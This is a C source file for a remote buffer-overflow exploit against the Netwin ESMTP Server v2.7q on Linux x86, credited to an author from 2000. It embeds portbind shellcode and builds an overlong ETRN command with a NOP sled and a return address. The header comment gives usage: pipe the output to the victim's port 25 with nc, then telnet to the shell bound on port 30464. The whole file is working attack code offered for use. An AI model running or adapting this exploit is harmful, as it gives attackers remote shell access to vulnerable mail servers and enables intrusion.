/*
 * Netwin ESMTP Server v2.7q linux x86 remote exploit 
 * funkySh 05/06/2000 (Taeho Oh portbind shell)
 * hello to b0f, #hax
 * 
 * [ AAA ][ RET ][ NOP ][ SHELL ]
 * $ (./dmx [offset] ; cat ) | nc victim 25
 * $ telnet victim 30464
 *
 * (tested on RH6.1)
 */
         
#include <stdio.h>

char code[]=
        "\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x43\xeb\x43\x5e\x31\xc0"
        "\x31\xdb\x89\xf1\xb0\x02\x89\x06\xb0\x01\x89\x46\x04\xb0\x06"
        "\x89\x46\x08\xb0\x66\xb3\x01\xcd\x80\x89\x06\xb0\x02\x66\x89"
        "\x46\x0c\xb0\x77\x66\x89\x46\x0e\x8d\x46\x0c\x89\x46\x04\x31"
        "\xc0\x89\x46\x10\xb0\x10\x89\x46\x08\xb0\x66\xb3\x02\xcd\x80"
        "\xeb\x04\xeb\x55\xeb\x5b\xb0\x01\x89\x46\x04\xb0\x66\xb3\x04"
        "\xcd\x80\x31\xc0\x89\x46\x04\x89\x46\x08\xb0\x66\xb3\x05\xcd"
        "\x80\x88\xc3\xb0\x3f\x31\xc9\xcd\x80\xb0\x3f\xb1\x01\xcd\x80"
        "\xb0\x3f\xb1\x02\xcd\x80\xb8\x2f\x62\x69\x6e\x89\x06\xb8\x2f"
        "\x73\x68\x2f\x89\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89"
        "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31"
        "\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\x5b\xff\xff\xff";

#define BUFFER 1100
#define A_BUFF 250

#define RET_ADDR 0xbfffca74
#define ALIGN 0

char buf[BUFFER];

int main(int argc, char * argv[])
{
  int i, offset = 0;
  long address;
  if(argc > 1) offset = atoi(argv[1]);
  address = RET_ADDR + offset;
  memset(buf,0x90,BUFFER);
  memset(buf,0x41,A_BUFF);
  for(i=240+ALIGN;i<350;i+=4)
    *(int *)&buf[i]=address;

  memcpy(buf+880,code,strlen(code));
  fprintf(stderr,"Using: 0x%x\n", address);
  printf("HELO dupa\n",0);
  printf("ETRN %s\n", buf);
  fprintf(stderr,"Now try to telnet victim:30464\n");
}